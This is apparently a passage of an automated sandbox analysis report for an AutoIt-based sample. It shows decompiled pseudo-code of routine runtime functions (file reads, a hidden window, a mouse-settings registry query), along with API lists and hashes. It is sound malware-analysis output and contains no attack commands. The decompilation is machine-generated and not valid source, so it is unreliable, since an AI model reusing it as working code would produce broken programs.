									__eflags = _t269 -  *((intOrPtr*)(_t255 - 0x2f8));
								} while (_t269 <  *((intOrPtr*)(_t255 - 0x2f8)));
							}
							 *((intOrPtr*)(_t255 - 0x2f8)) = 0;
							_t169 = E013D0234( *((intOrPtr*)(_t255 - 0x2fc)));
							_t235 =  *(_t255 - 0x308);
							if(_t235 != 0) {
								do {
									_t270 =  *(_t235 + 0x10);
									_t169 = E01416CF0(_t235, __eflags, _t235);
									_t235 = _t270;
									__eflags = _t270;
								} while (__eflags != 0);
							}
							 *((intOrPtr*)(_t255 - 0x31c)) = 0x144db48;
							E013B5228(_t169, _t255 - 0x31c);
							E013D0234( *((intOrPtr*)(_t255 - 0x31c + 4)));
							_t238 =  *(_t255 - 0x324);
							if(_t238 != 0) {
								do {
									_t272 =  *(_t238 + 0x10);
									E013CED4E(_t238, _t238);
									_t238 = _t272;
									__eflags = _t272;
								} while (_t272 != 0);
							}
							_t239 =  *(_t255 - 0x330);
							if(_t239 != 0) {
								do {
									_t273 =  *(_t239 + 0x30);
									E01423B5C(_t239, _t239);
									_t239 = _t273;
									__eflags = _t273;
								} while (_t273 != 0);
							}
							E013B5CF3(E013B774C(_t255 - 0x344), _t255 - 0x35c);
							_t242 =  *(_t255 - 0x368);
							if(_t242 != 0) {
								do {
									_t274 =  *(_t242 + 4);
									E01423BE3(_t242, _t242);
									_t242 = _t274;
									__eflags = _t274;
								} while (_t274 != 0);
							}
							 *((intOrPtr*)(_t255 - 0x360)) = 0;
							_t243 =  *(_t255 - 0x374);
							if(_t243 != 0) {
								do {
									_t275 =  *(_t243 + 4);
									E01423BE3(_t243, _t243);
									_t243 = _t275;
									__eflags = _t275;
								} while (_t275 != 0);
							}
							 *((intOrPtr*)(_t255 - 0x36c)) = 0;
							E013B774C(_t255 - 0x3bc);
							E013B774C(_t255 - 0x3cc);
							E013B774C(_t255 - 0x3dc);
							return E013B702C(_t255 - 0x40c);
						}
					} else {
						_v8 = 0;
						do {
							_push(_t213);
							E013B5145(_t146 - 0x494,  &_v8);
							_t213 = _t255 - 0x490 +  *((intOrPtr*)( *_t205 + 4));
							E013B5189(_t213);
							_t146 =  *((intOrPtr*)( *_t205 + 4)) + _t255;
						} while ( *((intOrPtr*)( *((intOrPtr*)( *_t205 + 4)) + _t255 - 0x490)) != 0);
						goto L8;
					}
				}
			}

0x013b63d1
0x013b63d5
0x013b63d7
0x013b63e2
0x013b63f8
0x013b63ff
0x013b6407
0x013f4dc7
0x013f4dc7
0x013b640d
0x013b6417
0x013b6423
0x013b6684
0x013b668d
0x013b668f
0x013b6691
0x013b669b
0x013b66aa
0x013b66ac
0x013b66ae
0x013b66b1
0x013b66b1
0x013b66ae
0x013b66b6
0x013b66b7
0x013b66b7
0x00000000
0x013b6429
0x013b6429
0x013b6429
0x013b6431
0x013f4dd2
0x013f4ddb
0x013f4ddd
0x013f4ddf
0x013f4de1
0x013f4de4
0x013f4df3
0x013f4de6
0x013f4de9
0x013f4de9
0x013f4e02
0x013f4e04
0x013f4e06
0x013f4e09
0x013f4e09
0x013f4e06
0x013f4e0e
0x013f4e0f
0x013f4e0f
0x013f4e17
0x013b6439
0x013b643e
0x013b6446
0x013f4e1c
0x013f4e22
0x013f4e25
0x013f4e28
0x013f4e2c
0x013f4e2c
0x013f4e32
0x013f4e33
0x013f4e33
0x013f4e3b
0x013b644c
0x013b6454
0x013f4e40
0x013f4e49
0x013f4e4b
0x013f4e4d
0x013f4e59
0x013f4e68
0x013f4e6a
0x013f4e6c
0x013f4e6f
0x013f4e6f
0x013f4e6c
0x013f4e74
0x013f4e75
0x013f4e75
0x013f4e7d
0x013b645a
0x013b6462
0x013b6467
0x013b6469
0x013b6470
0x013b6477
0x013b647f
0x013b64b6
0x013b64b6
0x013b64bc
0x013b64c1
0x013f4e82
0x013f4e82
0x013f4e82
0x013f4e86
0x013f4e90
0x013f4e90
0x013f4e86
0x013b64c7
0x013b64cc
0x013f4e97
0x013f4e97
0x013f4e9b
0x013f4ea0
0x013f4ea2
0x013f4ea2
0x00000000
0x013b64d2
0x013b64d2
0x013b64d4
0x013b64d7
0x013b64dc
0x013b66c5
0x013b66c5
0x013b66c9
0x013b66ce
0x013b66d0
0x013b66d2
0x00000000
0x00000000
0x013b66d8
0x013b66c5
0x013b64e2
0x013b64e5
0x013b64e8
0x013b64f3
0x013b6500
0x013b6506
0x013b650e
0x013b651a
0x013b6525
0x013b6530
0x013b653d
0x013b6543
0x013b654b
0x013b6550
0x013b6552
0x013b6563
0x013f4eab
0x013f4eb1
0x013f4eb6
0x013f4ec3
0x013f4ec6
0x013f4ec7
0x013f4ec7
0x013f4ecf
0x013b656f
0x013b6575
0x013b657a
0x013b657c
0x013b658d
0x013f4ed4
0x013f4eda
0x013f4edf
0x013f4eec
0x013f4eef
0x013f4ef0
0x013f4ef0
0x013f4ef8
0x013b6599
0x013b659f
0x013b65a4
0x013b65a6
0x013b65b7
0x013f4efd
0x013f4f03
0x013f4f08
0x013f4f15
0x013f4f18
0x013f4f19
0x013f4f19
0x013f4f21
0x013b65c3
0x013b65c9
0x013b65cf
0x013b65d7
0x013f4f26
0x013f4f26
0x013f4f2a
0x013f4f2f
0x013f4f31
0x013f4f31
0x013f4f35
0x013b65e5
0x013b65eb
0x013b65f3
0x013b65f9
0x013b6601
0x013f4f3a
0x013f4f3a
0x013f4f3e
0x013f4f43
0x013f4f45
0x013f4f45
0x013f4f49
0x013b6607
0x013b660f
0x013f4f4e
0x013f4f4e
0x013f4f52
0x013f4f57
0x013f4f59
0x013f4f59
0x013f4f5d
0x013b6626
0x013b662b
0x013b6633
0x013f4f62
0x013f4f62
0x013f4f66
0x013f4f6b
0x013f4f6d
0x013f4f6d
0x013f4f71
0x013b6639
0x013b663f
0x013b6647
0x013f4f76
0x013f4f76
0x013f4f7a
0x013f4f7f
0x013f4f81
0x013f4f81
0x013f4f85
0x013b6653
0x013b6659
0x013b6664
0x013b666f
0x013b6683
0x013b6683
0x013b6481
0x013b6481
0x013b6484
0x013b6484
0x013b648f
0x013b649f
0x013b64a1
0x013b64ab
0x013b64ad
0x00000000
0x013b6484
0x013b647f

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 013B6417
OleUninitialize.OLE32(?,00000000), ref: 013B64B6
UnregisterHotKey.USER32(?), ref: 013B669B
DestroyWindow.USER32(?), ref: 013F4DC7
FreeLibrary.KERNEL32(?), ref: 013F4E2C
VirtualFree.KERNEL32(?,00000000,00008000), ref: 013F4E59

Strings

close all, xrefs: 013B6412

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: a3f494c1ccb3028ed9cfcb8b26ff7ae4fb70ed1a99da76e5aa9030c3e7586fa9
Instruction ID: 978236962488acb621374acb46f748238473d0e79f4417e4be377cdd45491ada
Opcode Fuzzy Hash: a3f494c1ccb3028ed9cfcb8b26ff7ae4fb70ed1a99da76e5aa9030c3e7586fa9
Instruction Fuzzy Hash: 83D18F71701212CFCB29DF58C485B6AF7A5BF14718F1542AEEA4A6B662DB30EC12CF40

Uniqueness

Uniqueness Score: -1.00%

Function 013E9165, Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E013E9165(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				char _v6;
				void* _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				long _v36;
				void* _v40;
				long _v44;
				signed int* _t143;
				signed int _t145;
				intOrPtr _t149;
				signed int _t153;
				signed int _t155;
				signed char _t157;
				unsigned int _t158;
				intOrPtr _t162;
				void* _t163;
				signed int _t164;
				signed int _t167;
				long _t168;
				intOrPtr _t175;
				signed int _t176;
				intOrPtr _t178;
				signed int _t180;
				signed int _t184;
				char _t191;
				char* _t192;
				char _t199;
				char* _t200;
				signed char _t211;
				signed int _t213;
				long _t215;
				signed int _t216;
				char _t218;
				signed char _t222;
				signed int _t223;
				unsigned int _t224;
				intOrPtr _t225;
				unsigned int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed char _t236;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t246;
				void* _t248;
				void* _t249;

				_t213 = _a4;
				if(_t213 != 0xfffffffe) {
					__eflags = _t213;
					if(_t213 < 0) {
						L58:
						_t143 = E013E2C25();
						 *_t143 =  *_t143 & 0x00000000;
						__eflags =  *_t143;
						 *((intOrPtr*)(E013E2C38())) = 9;
						L59:
						_t145 = E013E2B7C();
						goto L60;
					}
					__eflags = _t213 -  *0x14821d8; // 0x40
					if(__eflags >= 0) {
						goto L58;
					}
					_v24 = 1;
					_t239 = _t213 >> 6;
					_t235 = (_t213 & 0x0000003f) * 0x30;
					_v20 = _t239;
					_t149 =  *((intOrPtr*)(0x1481fd8 + _t239 * 4));
					_v28 = _t235;
					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
					_v5 = _t222;
					__eflags = _t222 & 0x00000001;
					if((_t222 & 0x00000001) == 0) {
						goto L58;
					}
					_t223 = _a12;
					__eflags = _t223 - 0x7fffffff;
					if(_t223 <= 0x7fffffff) {
						__eflags = _t223;
						if(_t223 == 0) {
							L57:
							return 0;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L57;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
						_v5 = _t153;
						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
						_t246 = 0;
						_t155 = _t153 - 1;
						__eflags = _t155;
						if(_t155 == 0) {
							_t236 = _v24;
							_t157 =  !_t223;
							__eflags = _t236 & _t157;
							if((_t236 & _t157) != 0) {
								_t158 = 4;
								_t224 = _t223 >> 1;
								_v16 = _t158;
								__eflags = _t224 - _t158;
								if(_t224 >= _t158) {
									_t158 = _t224;
									_v16 = _t224;
								}
								_t246 = E013E3C40(_t224, _t158);
								E013E2DE8(0);
								E013E2DE8(0);
								_t249 = _t248 + 0xc;
								_v12 = _t246;
								__eflags = _t246;
								if(_t246 != 0) {
									_t162 = E013E9844(_t213, 0, 0, _v24);
									_t225 =  *((intOrPtr*)(0x1481fd8 + _t239 * 4));
									_t248 = _t249 + 0x10;
									_t240 = _v28;
									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
									_t163 = _t246;
									 *(_t240 + _t225 + 0x24) = _t236;
									_t235 = _t240;
									_t223 = _v16;
									L21:
									_t241 = 0;
									_v40 = _t163;
									_t215 =  *((intOrPtr*)(0x1481fd8 + _v20 * 4));
									_v36 = _t215;
									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
									_t216 = _a4;
									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
										_v6 = _t218;
										__eflags = _t218 - 0xa;
										_t216 = _a4;
										if(_t218 != 0xa) {
											__eflags = _t223;
											if(_t223 != 0) {
												_t241 = _v24;
												 *_t163 = _v6;
												_t216 = _a4;
												_t232 = _t223 - 1;
												__eflags = _v5;
												_v12 = _t163 + 1;
												_v16 = _t232;
												 *((char*)(_t235 +  *((intOrPtr*)(0x1481fd8 + _v20 * 4)) + 0x2a)) = 0xa;
												if(_v5 != 0) {
													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x1481fd8 + _v20 * 4)) + 0x2b));
													_v6 = _t191;
													__eflags = _t191 - 0xa;
													if(_t191 != 0xa) {
														__eflags = _t232;
														if(_t232 != 0) {
															_t192 = _v12;
															_t241 = 2;
															 *_t192 = _v6;
															_t216 = _a4;
															_t233 = _t232 - 1;
															_v12 = _t192 + 1;
															_v16 = _t233;
															 *((char*)(_t235 +  *((intOrPtr*)(0x1481fd8 + _v20 * 4)) + 0x2b)) = 0xa;
															__eflags = _v5 - _v24;
															if(_v5 == _v24) {
																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x1481fd8 + _v20 * 4)) + 0x2c));
																_v6 = _t199;
																__eflags = _t199 - 0xa;
																if(_t199 != 0xa) {
																	__eflags = _t233;
																	if(_t233 != 0) {
																		_t200 = _v12;
																		_t241 = 3;
																		 *_t200 = _v6;
																		_t216 = _a4;
																		_t234 = _t233 - 1;
																		__eflags = _t234;
																		_v12 = _t200 + 1;
																		_v16 = _t234;
																		 *((char*)(_t235 +  *((intOrPtr*)(0x1481fd8 + _v20 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t164 = E013EFCBC(_t216);
									__eflags = _t164;
									if(_t164 == 0) {
										L41:
										_v24 = 0;
										L42:
										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0); // executed
										__eflags = _t167;
										if(_t167 == 0) {
											L53:
											_t168 = GetLastError();
											_t241 = 5;
											__eflags = _t168 - _t241;
											if(_t168 != _t241) {
												__eflags = _t168 - 0x6d;
												if(_t168 != 0x6d) {
													L37:
													E013E2C02(_t168);
													goto L38;
												}
												_t242 = 0;
												goto L39;
											}
											 *((intOrPtr*)(E013E2C38())) = 9;
											 *(E013E2C25()) = _t241;
											goto L38;
										}
										_t229 = _a12;
										__eflags = _v36 - _t229;
										if(_v36 > _t229) {
											goto L53;
										}
										_t242 = _t241 + _v36;
										__eflags = _t242;
										L45:
										_t237 = _v28;
										_t175 =  *((intOrPtr*)(0x1481fd8 + _v20 * 4));
										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v24;
												_push(_t242 >> 1);
												_push(_v40);
												_push(_t216);
												if(_v24 == 0) {
													_t176 = E013E8CC1();
												} else {
													_t176 = E013E8FD1();
												}
											} else {
												_t230 = _t229 >> 1;
												__eflags = _t229 >> 1;
												_t176 = E013E8E81(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
											}
											_t242 = _t176;
										}
										goto L39;
									}
									_t231 = _v28;
									_t178 =  *((intOrPtr*)(0x1481fd8 + _v20 * 4));
									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
										goto L41;
									}
									_t180 = GetConsoleMode(_v32,  &_v44);
									__eflags = _t180;
									if(_t180 == 0) {
										goto L41;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L42;
									}
									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
									__eflags = _t184;
									if(_t184 != 0) {
										_t229 = _a12;
										_t242 = _t241 + _v36 * 2;
										goto L45;
									}
									_t168 = GetLastError();
									goto L37;
								} else {
									 *((intOrPtr*)(E013E2C38())) = 0xc;
									 *(E013E2C25()) = 8;
									L38:
									_t242 = _t241 | 0xffffffff;
									__eflags = _t242;
									L39:
									E013E2DE8(_t246);
									return _t242;
								}
							}
							L15:
							 *(E013E2C25()) =  *_t206 & _t246;
							 *((intOrPtr*)(E013E2C38())) = 0x16;
							E013E2B7C();
							goto L38;
						}
						__eflags = _t155 != 1;
						if(_t155 != 1) {
							L13:
							_t163 = _a8;
							_v16 = _t223;
							_v12 = _t163;
							goto L21;
						}
						_t211 =  !_t223;
						__eflags = _t211 & 0x00000001;
						if((_t211 & 0x00000001) == 0) {
							goto L15;
						}
						goto L13;
					}
					L6:
					 *(E013E2C25()) =  *_t151 & 0x00000000;
					 *((intOrPtr*)(E013E2C38())) = 0x16;
					goto L59;
				} else {
					 *(E013E2C25()) =  *_t212 & 0x00000000;
					_t145 = E013E2C38();
					 *_t145 = 9;
					L60:
					return _t145 | 0xffffffff;
				}
			}

0x013e916e
0x013e9175
0x013e918f
0x013e9191
0x013e94f9
0x013e94f9
0x013e94fe
0x013e94fe
0x013e9506
0x013e950c
0x013e950c
0x00000000
0x013e950c
0x013e9197
0x013e919d
0x00000000
0x00000000
0x013e91a5
0x013e91b1
0x013e91b4
0x013e91b7
0x013e91ba
0x013e91c1
0x013e91c4
0x013e91c8
0x013e91cb
0x013e91ce
0x00000000
0x00000000
0x013e91d4
0x013e91d7
0x013e91dd
0x013e91f7
0x013e91f9
0x013e94f5
0x00000000
0x013e94f5
0x013e91ff
0x013e9203
0x00000000
0x00000000
0x013e9209
0x013e920d
0x00000000
0x00000000
0x013e9214
0x013e9218
0x013e921b
0x013e921e
0x013e9223
0x013e9223
0x013e9226
0x013e9243
0x013e9248
0x013e924a
0x013e924c
0x013e926c
0x013e926d
0x013e926f
0x013e9272
0x013e9274
0x013e9276
0x013e9278
0x013e9278
0x013e9283
0x013e9285
0x013e928c
0x013e9291
0x013e9294
0x013e9297
0x013e9299
0x013e92be
0x013e92c3
0x013e92ca
0x013e92cd
0x013e92d0
0x013e92d4
0x013e92d6
0x013e92da
0x013e92dc
0x013e92df
0x013e92e2
0x013e92e4
0x013e92e7
0x013e92ee
0x013e92f1
0x013e92f6
0x013e92f9
0x013e9302
0x013e9306
0x013e9309
0x013e930c
0x013e930f
0x013e9315
0x013e9317
0x013e9320
0x013e9323
0x013e9326
0x013e9329
0x013e932a
0x013e932e
0x013e9334
0x013e933e
0x013e9343
0x013e9353
0x013e9357
0x013e935a
0x013e935c
0x013e935e
0x013e9360
0x013e9362
0x013e936a
0x013e936b
0x013e936e
0x013e9371
0x013e9372
0x013e9378
0x013e9382
0x013e938a
0x013e938d
0x013e9399
0x013e939d
0x013e93a0
0x013e93a2
0x013e93a4
0x013e93a6
0x013e93a8
0x013e93b0
0x013e93b1
0x013e93b4
0x013e93b7
0x013e93b7
0x013e93b8
0x013e93be
0x013e93c8
0x013e93c8
0x013e93a6
0x013e93a2
0x013e938d
0x013e9360
0x013e935c
0x013e9343
0x013e9317
0x013e930f
0x013e93ce
0x013e93d4
0x013e93d6
0x013e9449
0x013e9449
0x013e944d
0x013e945d
0x013e9463
0x013e9465
0x013e94c1
0x013e94c1
0x013e94c9
0x013e94ca
0x013e94cc
0x013e94e5
0x013e94e8
0x013e9425
0x013e9426
0x00000000
0x013e942b
0x013e94ee
0x00000000
0x013e94ee
0x013e94d3
0x013e94de
0x00000000
0x013e94de
0x013e9467
0x013e946a
0x013e946d
0x00000000
0x00000000
0x013e946f
0x013e946f
0x013e9472
0x013e9475
0x013e9478
0x013e947f
0x013e9484
0x013e9486
0x013e948a
0x013e94a5
0x013e94a9
0x013e94aa
0x013e94ad
0x013e94ae
0x013e94ba
0x013e94b0
0x013e94b0
0x013e94b0
0x013e948c
0x013e948c
0x013e948c
0x013e9497
0x013e949c
0x013e949f
0x013e949f
0x00000000
0x013e9484
0x013e93db
0x013e93de
0x013e93e5
0x013e93ea
0x00000000
0x00000000
0x013e93f3
0x013e93f9
0x013e93fb
0x00000000
0x00000000
0x013e93fd
0x013e9401
0x00000000
0x00000000
0x013e9415
0x013e941b
0x013e941d
0x013e9441
0x013e9444
0x00000000
0x013e9444
0x013e941f
0x00000000
0x013e929b
0x013e92a0
0x013e92ab
0x013e942c
0x013e942c
0x013e942c
0x013e942f
0x013e9430
0x00000000
0x013e9438
0x013e9299
0x013e924e
0x013e9253
0x013e925a
0x013e9260
0x00000000
0x013e9260
0x013e9228
0x013e922b
0x013e9235
0x013e9235
0x013e9238
0x013e923b
0x00000000
0x013e923b
0x013e922f
0x013e9231
0x013e9233
0x00000000
0x00000000
0x00000000
0x013e9233
0x013e91df
0x013e91e4
0x013e91ec
0x00000000
0x013e9177
0x013e917c
0x013e917f
0x013e9184
0x013e9511
0x00000000
0x013e9511

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06f9abbf325f18be9455c76508024b7d0d7e2a2b6275fbc811f02096a6c75d37
Instruction ID: b283adde9c5ae6153ebf8bb19191c2eaf5c74fb8681336f4ae6e2d08edfdba1c
Opcode Fuzzy Hash: 06f9abbf325f18be9455c76508024b7d0d7e2a2b6275fbc811f02096a6c75d37
Instruction Fuzzy Hash: 1AC19E75A0436A9FDF11DFACC848BAEBBF4AF1931CF044199EA14A72D1C7349941CB61

Uniqueness

Uniqueness Score: -1.00%

Function 013B3546, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E013B3546() {
				struct HWND__* _t3;
				struct HWND__* _t4;
				int _t6;

				_t3 = CreateWindowExW(0, L"AutoIt v3", L"AutoIt v3", 0xcf0000, 0x80000000, 0x80000000, 0x12c, 0x64, 0, 0,  *0x1482348, 0); // executed
				 *0x148237c = _t3;
				_t4 = CreateWindowExW(0, L"edit", 0, 0x50b008c4, 0, 0, 0, 0, _t3, 1,  *0x1482348, 0); // executed
				 *0x1482378 = _t4; // executed
				ShowWindow( *0x148237c, 0); // executed
				_t6 = ShowWindow( *0x148237c, 0); // executed
				return _t6;
			}

0x013b3574
0x013b357d
0x013b3595
0x013b35a4
0x013b35a9
0x013b35b2
0x013b35b6

APIs

CreateWindowExW.USER32 ref: 013B3574
CreateWindowExW.USER32 ref: 013B3595
ShowWindow.USER32(00000000,?,?,?,?,?,?,013B292D,?), ref: 013B35A9
ShowWindow.USER32(00000000,?,?,?,?,?,?,013B292D,?), ref: 013B35B2

Strings

edit, xrefs: 013B358F
AutoIt v3, xrefs: 013B356C, 013B3571, 013B3572

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: fc3f09c99f1f4aa4c18aabf4852e5d3d4e8883d7416dcf476ab1097d6f18fa38
Instruction ID: 47ac2f7f39c05c9447b291bc455ba5e55823c0abc255197d84c666c15d3e4f37
Opcode Fuzzy Hash: fc3f09c99f1f4aa4c18aabf4852e5d3d4e8883d7416dcf476ab1097d6f18fa38
Instruction Fuzzy Hash: DCF0DA75A403907EEB315A776C19E3F6E7DE7DAF50F10002EB904A2174C6B11850DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 013B529A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E013B529A(void* __ecx, short* __edx, short* _a4, intOrPtr _a8, char* _a12) {
				int _v8;
				void* _v12;
				int* _t18;
				long _t21;
				long _t24;
				signed int _t27;
				int _t31;
				int _t36;
				char* _t40;

				_push(__ecx);
				_push(__ecx);
				if(_a4 == 0) {
					L10:
					_t18 = 0;
				} else {
					_t40 = _a12;
					if(_t40 == 0) {
						goto L10;
					} else {
						_t31 = 0;
						 *_t40 = 0;
						_t21 = RegOpenKeyExW(__ecx, __edx, 0, 1,  &_v12); // executed
						if(_t21 != 0) {
							goto L10;
						} else {
							_t22 = _a8;
							_t36 = _a8 + _t22;
							_v8 = _t36;
							_t24 = RegQueryValueExW(_v12, _a4, 0, 0, _t40,  &_v8); // executed
							if(_t24 == 0) {
								_t27 = _v8 >> 1;
								_v8 = _t27;
								if(_t27 >= _a8) {
									 *((short*)(_t36 + _t40 - 2)) = 0;
								} else {
									 *((short*)(_t40 + _t27 * 2)) = 0;
								}
								_t31 = 1;
							}
							RegCloseKey(_v12); // executed
							_t18 = _t31;
						}
					}
				}
				return _t18;
			}

0x013b529d
0x013b529e
0x013b52a5
0x013b5317
0x013b5317
0x013b52a7
0x013b52a7
0x013b52ac
0x00000000
0x013b52ae
0x013b52b0
0x013b52b2
0x013b52be
0x013b52c6
0x00000000
0x013b52c8
0x013b52c8
0x013b52cc
0x013b52d2
0x013b52df
0x013b52e7
0x013b52ec
0x013b52ee
0x013b52f4
0x013b5310
0x013b52f6
0x013b52f8
0x013b52f8
0x013b52fc
0x013b52fc
0x013b5301
0x013b5307
0x013b5309
0x013b52c6
0x013b52ac
0x013b530d

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,013B528D,SwapMouseButtons,00000004,?), ref: 013B52BE
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,013B528D,SwapMouseButtons,00000004,?), ref: 013B52DF
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,013B528D,SwapMouseButtons,00000004,?), ref: 013B5301

Strings

Control Panel\Mouse, xrefs: 013B52BC

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 83f39bce5d489ad3fe815fc25cf7f576dae9ea88fe80e9c029a23f64df3a24d8
Instruction ID: 9a344d0771528efa568ed2aa9850a37d4c35ea02bf7c8f1451351a524c2b9a83
Opcode Fuzzy Hash: 83f39bce5d489ad3fe815fc25cf7f576dae9ea88fe80e9c029a23f64df3a24d8
Instruction Fuzzy Hash: 61113CB5621208BFDB218FA8D884EEEBBBCEF04748F044459BA05D7614E3B1DE419B60

Uniqueness

Uniqueness Score: -1.00%

Function 013D01FB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 013D0A88

Part of subcall function 013D36C4: RaiseException.KERNEL32(?,?,?,013D0AAA,?,?,?,?,?,?,?,?,013D0AAA,?,014796A0), ref: 013D3724

__CxxThrowException@8.LIBVCRUNTIME ref: 013D0AA5

Strings

Unknown exception, xrefs: 013D0AB2

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 1167680424b8b5380920ed8645f362154a64d8444c7138dccaa454e79dead2c5
Instruction ID: 9a111870b79f32095df42db275d609266f442420e9b662d74471bcc21f2a9277
Opcode Fuzzy Hash: 1167680424b8b5380920ed8645f362154a64d8444c7138dccaa454e79dead2c5
Instruction Fuzzy Hash: 33F0C83690030E77DB09FABDF884D9D7B6C9A10A2CF604225B928965A1EB71DA16C5C1

Uniqueness

Uniqueness Score: -1.00%

Function 013B38E2, Relevance: 4.7, APIs: 3, Instructions: 152
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 013B3700: MapVirtualKeyW.USER32(0000005B,00000000), ref: 013B3731
Part of subcall function 013B3700: MapVirtualKeyW.USER32(00000010,00000000), ref: 013B3739
Part of subcall function 013B3700: MapVirtualKeyW.USER32(000000A0,00000000), ref: 013B3744
